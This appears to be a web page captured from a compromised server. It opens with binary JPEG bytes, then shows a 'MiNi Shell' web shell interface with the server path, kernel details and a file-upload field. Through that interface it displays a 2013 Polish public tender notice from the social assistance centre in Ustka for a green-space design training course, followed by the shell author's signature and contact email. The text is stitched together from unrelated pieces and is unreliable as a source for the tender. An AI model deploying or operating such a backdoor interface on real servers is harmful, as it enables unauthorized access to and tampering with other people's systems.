JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130329/125512-N-2013.html

<p class="kh_header"><b>Ustka: Kompleksowa realizacja usługi - Szkolenia 
Projektowanie i pielęgnacja terenów zielonych dla 8 osób (kobiet i mężczyzn) nieaktywnych zawodowo w ramach projektu systemowego p.n. Ty też możesz - Zadanie 1 Aktywna integracja</b><br>
<b>Numer ogłoszenia: 125512 - 2013; data zamieszczenia: 29.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej , Dunina 24, 76-270 Ustka, woj. pomorskie, tel. 59 8147 197, faks 59 8147 197.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa realizacja usługi - Szkolenia 
Projektowanie i pielęgnacja terenów zielonych dla 8 osób (kobiet i mężczyzn) nieaktywnych zawodowo w ramach projektu systemowego p.n. Ty też możesz - Zadanie 1 Aktywna integracja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa realizacja  usługi -  Szkolenia  Projektowanie i pielęgnacja terenów zielonych dla 8 osób (kobiet i mężczyzn) nieaktywnych zawodowo w ramach projektu systemowego p.n. Ty też możesz - Zadanie 1 Aktywna integracja. Projekt jest realizowany przez Gminny Ośrodek Pomocy Społecznej w Ustce w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1., Poddziałanie 7.1.1. , współfinansowany ze środków  Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Grupy docelowe - odbiorcy usługi:8 osób (uczestnicy i uczestniczki projektu) nieaktywnych zawodowo, korzystających ze świadczeń pomocy społecznej GOPS w Ustce, w wieku aktywności zawodowej,  zagrożonych wykluczeniem społecznym z terenu Gminy Ustka. 
Cel i program szkolenia: 
Celem szkolenia jest nabycie wiadomości i umiejętności z tworzenia, aranżowania i projektowania ogrodów przydomowych, zagospodarowania publicznych terenów zieleni miejskiej, zieleni przy inwestycjach, pielęgnacji ogrodów i terenów zieleni miejskiej, cięcia i formowania roślin. 
Wykonawca opracuje i przedłoży Zamawiającemu program szkolenia jako załącznik do  oferty. 
Program szkolenia musi określać:nazwę i zakres tematyczny szkolenia,cel szkolenia,czas trwania i sposób organizacji szkolenia, ilość godzin teoretycznych i  praktycznych,miejsce szkolenia,szczegółowy rozkład treści nauczania w zakresie poszczególnych zajęć edukacyjnych wraz z określeniem liczby godzin,wykaz literatury,wykaz materiałów szkoleniowych, (zeszyt A4 w kratkę, długopis, skrypt w wersji drukowanej i podręcznik z zakresu prowadzonego szkolenia) - Zamawiający zastrzega, iż  podręcznik nie może mieć formy kserokopii, jak i nie może być zapisany na nośniku elektronicznym, sposób sprawdzania  efektów szkolenia,całkowity koszt szkolenia. Materiały szkoleniowe po zakończeniu zajęć  przechodzą na własność uczestników szkolenia.Program szkolenia musi zawierać zajęcia z podstaw obsługi komputera - 35 godzin szkoleniowych. (Podstawy obsługi komputera w systemie operacyjnym MS Windows, zarządzanie danymi, podstawy obsługi edytora tekstów MS Word,  podstawy obsługi arkusza kalkulacyjnego MS Excel). Cel główny projektu:Celem głównym projektu jest aktywizacja  społeczno - zawodowa grupy 47 osób (35 kobiet i 12 mężczyzn), w tym 8 kobiet  niepełnosprawnych  i  5 mężczyzn niepełnosprawnych  zagrożonych wykluczeniem  społecznym z terenu gminy Ustka w latach 2012 - 2014.Grupa 8 osób ( kobiet i  mężczyzn, w tym osoby niepełnosprawne).
Czas realizacji:Usługa realizacji szkolenia obejmuje 20 dni szkoleniowych.Łączna liczba godzin realizacji szkolenia: 140 godzin  - (godziny zegarowe - 60 min.).Łączna liczba osób biorących udział w szkoleniu: 8  osób.Miejsce realizacji szkolenia: Wytowno na terenie Gminy Ustka (dokładny adres miejsca realizacji zajęć, Wykonawca wskaże w szczegółowym harmonogramie zajęć).Termin realizacji szkolenia: od dnia podpisania umowy (szkolenie musi rozpocząć się w maju) do dnia  28.06.2013r., w dni robocze od poniedziałku do piątku.  Maksymalnie 7 godzin szkolenia dziennie. Sugerowane godziny: od 8.00 do 15.00.

Obowiązki organizacyjne Wykonawcy:1. Zapewnienie uczestnikom na czas trwania szkolenia sali szkoleniowej w miejscowości Wytowno na terenie Gminy Ustka -  przystosowanej do realizacji szkolenia.2. Sala szkoleniowa musi spełniać  następujące wymogi:jest dostosowana do swobodnego pomieszczenia grupy 8 osób + wykładowca,posiada zaplecze sanitarne,ma zapewnione ogrzewanie przy spadku temperatury zewnętrznej poniżej 10stopni C,posiada aneks kuchenny lub dostęp do zaplecza kuchennego,posiada odpowiednie oświetlenie,posiada minimum 4 stoły i 8 krzeseł.(W celu prawidłowej realizacji zajęć praktycznych, każdy uczestnik musi mieć swobodny dostęp, możliwość korzystania i pracy na sprzęcie, materiałach  zapewnionych przez Wykonawcę na potrzeby szkolenia.)3. Zapewnienia  odpowiednich  warunków  bezpieczeństwa i higieny pracy, zgodnie z obowiązującymi przepisami.4. Zapewnienie jednego ciepłego posiłku (obiadu składającego się z drugiego dania o wartości co najmniej 15 zł. brutto na 1 osobę)  dziennie dla każdego uczestnika szkolenia.5. Zapewnienia poczęstunku wszystkim uczestnikom i uczestniczkom szkolenia w postaci: kawa rozpuszczalna i sypana, herbata ekspresowa, cukier, śmietanka do kawy, ciastka  na każdy dzień trwania szkolenia.6. Wydania każdemu uczestnikowi szkolenia aktualnych materiałów szkoleniowych (określonych przez Zamawiającego w SIWZ) - 1 zestaw materiałów szkoleniowych dla 1 uczestnika.7. Zapewnienie każdemu uczestnikowi szkolenia materiałów lub sprzętu niezbędnego do przeprowadzenia zajęć na czas trwania szkolenia, w tym odzieży ochronnej.8. Wykonawca na własny koszt skieruje wszystkich uczestników szkolenia  na  badania  lekarskie oraz pokryje wszelkie koszty związane z przeprowadzeniem w/w badań - jeśli są wymagane.9. Wykonawca zapewni profesjonalnych wykładowców posiadających kwalifikacje, upoważniające do prowadzenia zajęć w przedmiotowym zakresie. Wszystkie zajęcia muszą być przeprowadzone przez wykładowców posiadających  kwalifikacje w przedmiotowym zakresie.10. Wykonawca obejmie wszystkich uczestników szkolenia ubezpieczeniem od następstw nieszczęśliwych wypadków powstałych w czasie szkolenia oraz w drodze do miejsca szkolenia i z powrotem, na czas trwania zajęć, w wysokości 10.000,00 zł. brutto na 1 osobę.11. Wykonawca zobowiązany będzie do bezzwłocznego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach.12. Wykonawca przeprowadzi ewaluację szkolenia - dokona oceny szkolenia za pomocą ankiet ewaluacyjnych opracowanych przez Wykonawcę  na zakończenie zajęć oraz sporządzi ich analizę - wśród 8 uczestników szkolenia.13. Wykonawca wyda każdemu uczestnikowi szkolenia oryginał zaświadczenia lub certyfikatu:potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji w przedmiotowym zakresie przez uczestnika szkolenia,zawierającego co najmniej: datę, temat szkolenia, wymiar godzin, logo PO KL i informację o współfinansowaniu ze środków Unii Europejskiej w ramach EFS,  zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym, Ministerstwa Rozwoju Regionalnego w zakresie informacji i promocji Programu  Operacyjnego Kapitał Ludzki.Wzór zaświadczenia lub certyfikatu Wykonawca przedłoży Zamawiającemu jako załącznik do oferty.14. Prowadzenia na bieżąco listy obecności uczestników, dziennika zajęć zawierającego co najmniej: daty, tematy zajęć wraz z liczbą godzin.15. Prowadzenie na bieżąco listy odbioru posiłku i poczęstunku przez uczestników szkolenia.16. Sporządzenie listy potwierdzającej odbiór materiałów szkoleniowych przez uczestników zajęć.17. Sporządzenie listy potwierdzającej odbiór  zaświadczeń lub certyfikatów przez uczestników zajęć.18. Wykonawca zapewni transport 3 uczestnikom szkolenia do miejsca realizacji zajęć i z powrotem. Dowóz 3 osób z miejscowości: Wodnica, Grabno i Zimowiska do miejsca realizacji szkolenia i z powrotem - w każdym dniu realizacji szkolenia. Zamawiający zastrzega sobie prawo do zmiany ilości osób i miejscowości w obrębie Gminy Ustka.19. Sporządzenia sprawozdania końcowego z wykonania przedmiotu umowy, po zakończeniu realizacji zajęć, zawierającego m.in. opis poszczególnych działań w ramach szkolenia.20. Sporządzenie fotograficznego - cyfrowego zapisu szkolenia na płycie CD. (zdjęcia z zajęć ze szkolenia).21. Wykonawca przeprowadzi egzamin wewnętrzny wśród 8 uczestników szkolenia na zakończenie zajęć oraz sporządzi protokół z egzaminu.22. Oznakowanie w sposób widoczny i czytelny pomieszczeń, w których będą odbywały się zajęcia logo PO KL i informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach EFS,  zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym, Ministerstwo Rozwoju Regionalnego w zakresie informacji i promocji Programu  Operacyjnego Kapitał Ludzki.23. Poinformowanie uczestników szkolenia przed rozpoczęciem zajęć o współfinansowaniu zajęć ze środków UE w ramach EFS.24. Oznaczenie logo PO KL i informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS  wszelkich dokumentów związanych z realizacją przedmiotu umowy, w tym materiałów szkoleniowych (zeszyt A4 w kratkę, skrypt w wersji drukowanej i podręcznik z zakresu prowadzonego szkolenia), zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym, Ministerstwa Rozwoju Regionalnego w zakresie informacji i promocji Programu  Operacyjnego Kapitał Ludzki.25. Wykonawca opracuje szczegółowy harmonogram zajęć, zawierający co najmniej: miejsce realizacji szkolenia, daty i godziny zajęć, który należy przedłożyć Zamawiającemu w dniu podpisania umowy, jako załącznik do umowy.26. Przestrzegania w ramach umowy, ustawy  z dnia 29 sierpnia 1997r. o ochronie danych osobowych Dz.U. z 2002r. Nr 101, poz. 926 ze zm.27. Przechowania dokumentacji związanej z realizacją przedmiotu umowy do dnia 31.12.2020r., w sposób zapewniający dostępność,  poufność i bezpieczeństwo.

Zamawiający zastrzega sobie prawo wglądu do dokumentów Wykonawcy  związanych z realizacją przedmiotu umowy, w tym dokumentów finansowych i dokumentów elektronicznych. Wykonawca podda się kontroli podmiotom uprawnionym do przeprowadzania kontroli  zadań realizowanych w ramach  projektów współfinansowanych ze środków Unii Europejskiej w ramach EFS.Zamawiający zastrzega sobie prawo dokonywania niezapowiedzianych kontroli z realizacji przedmiotu umowy,  kontroli  frekwencji uczestników szkolenia, sposobu prowadzenia  zajęć.Wykonawca wyznaczy osobę prowadzącą wewnętrzny nadzór nad realizacją umowy oraz do bezpośredniego kontaktowania się z Zamawiającym.Wykonawca nie może powierzyć wykonania  przedmiotu  umowy innym podwykonawcom.Wykonawca zobowiązuje się do:Przekazania Zamawiającemu w terminie do pięciu dni roboczych od daty zakończenia realizacji przedmiotu umowy pełnej dokumentacji szkoleniowej, obejmującej:kopie zaświadczeń lub certyfikatów potwierdzających ukończenie szkolenia przez uczestników/uczestniczki projektu, listy obecności uczestników, dziennik zajęć zawierający co najmniej: daty,  tematy zajęć  wraz  z  liczbą godzin, listy odbioru posiłku i poczęstunku przez uczestników szkolenia, listę  potwierdzającą  odbiór  materiałów  szkoleniowych  przez uczestników zajęć, listę potwierdzającą odbiór zaświadczeń lub certyfikatów przez uczestników zajęć, sprawozdanie końcowe z wykonania przedmiotu umowy, po zakończeniu realizacji zajęć, zawierające m.in. opis poszczególnych działań w ramach szkolenia, Fotograficzny - cyfrowy zapis szkolenia na płycie CD. (zdjęcia z zajęć ze szkolenia), protokół potwierdzający przeprowadzenie egzaminu wewnętrznego wśród 8 uczestników szkolenia, ankiety ewaluacyjne wraz ze sporządzoną ich analizą - wśród 8 uczestników szkolenia, 1 komplet materiałów szkoleniowych, tj. zeszyt A4 w kratkę, długopis, skrypt w wersji drukowanej i podręcznik z zakresu prowadzonego szkolenia) - Zamawiający zastrzega, iż  podręcznik nie może mieć formy kserokopii, jak i nie może być zapisany na nośniku elektronicznym.Wszelkie listy obecności, odbioru materiałów szkoleniowych itp., muszą zawierać czytelne podpisy uczestników..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca przedstawi dokumenty potwierdzające posiadanie aktualnego wpisu (na 2013 rok) do rejestru instytucji szkoleniowych,prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę Wykonawcy.
Ocena spełniania przedstawionych powyżej warunków udziału w postępowaniu zostanie  dokonana według formuły spełnia - nie spełnia w oparciu o załączone do oferty oświadczenia i dokumenty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia w oparciu o załączone do oferty oświadczenia i dokumenty.
warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje:
- do prowadzenia zająć teoretycznych - co najmniej jedną osobą posiadająca wykształcenie wyższe oraz posiadającą doświadczenie w przeprowadzeniu co najmniej jednej usługi szkoleniowej polegającej na przeszkoleniu grupy szkoleniowej składającej się z minimum 8 osób w zakresie ogrodnictwa lub tworzenia i zagospodarowania terenów zielonych;
- do prowadzenia zająć praktycznych - co najmniej jedną osobą posiadającej minimum wykształcenie średnie oraz doświadczenie w przeprowadzeniu co najmniej jednej usługi szkoleniowej  polegającej na przeprowadzeniu zajęć praktycznych  dot. przeszkolenia grupy szkoleniowej składającej się z minimum 8 osób w zakresie ogrodnictwa lub tworzenia i zagospodarowania terenów zielonych;
- do prowadzenia zajęć komputerowych - co najmniej jedną osobą posiadającą minimum wykształcenie wyższe oraz doświadczenie w przeprowadzeniu  co najmniej jednej usługi szkoleniowej  polegającej na przeprowadzeniu zajęć dot. przeszkolenia grupy szkoleniowej składającej się z minimum 8 osób w zakresie obsługi komputera.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP.2. oświadczenie  Wykonawcy o braku przynależności do grupy kapitałowej lub lista podmiotów należących do tej samej grupy kapitałowej. 3. dokumenty potwierdzające posiadanie aktualnego wpisu (na 2013 rok) do rejestru  instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę Wykonawcy.4. program szkolenia,  opracowany  zgodnie  z  postanowieniami  określonymi w  SIWZ.5.wzór zaświadczenia lub certyfikatu potwierdzającego ukończenie szkolenia przez uczestnika - uczestniczkę projektu,  zgodnie z postanowieniami  określonymi w SIWZ.6.Formularz oferty przygotowany zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ,7.oświadczenia i dokumenty wyszczególnione w punkcie 8 SIWZ,8. w przypadku działania Wykonawcy przez pełnomocnika, należy dołączyć do oferty  pełnomocnictwo w oryginale lub jego kopię poświadczoną notarialnie;9. w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo do reprezentowania tychże wykonawców, zgodnie z pkt. 9 SIWZ.10. w przypadku gdy Wykonawca będzie polegać na osobach zdolnych do wykonania zamówienia lub innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków - w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w zakresie: 1. Terminu realizacji zamówienia może ulec zmianie w sytuacji : - wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, 2. Inne możliwe zmiany w postanowieniach umowy : - zmiany Wykładowców realizujących przedmiot zamówienia, wymienionych w ofercie, przy czym nowo wskazana osoba powinna spełniać wymagania określone przez Zamawiającego w pkt 7.1.3 SIWZ i uzyskać akceptację Zamawiającego. Warunki zmian: a) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego, b) zgoda obu stron umowy, c)uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, zapewnienie optymalnych parametrów jakościowych usługi. Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz wymaga zgody drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.ustka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej 76-270 Ustka, ul. Piotra Dunina 24..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2013 godzina 15:00, miejsce: Ofertę należy dostarczyć do siedziby Zamawiającego i zaadresować: Gminny Ośrodek Pomocy Społecznej w Ustce, ul. Piotra Dunina 24, 76-270 Ustka (pok. Nr 15)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany jest przez Gminny Ośrodek Pomocy Społecznej w Ustce w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1., Poddziałanie 7.1.1., współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com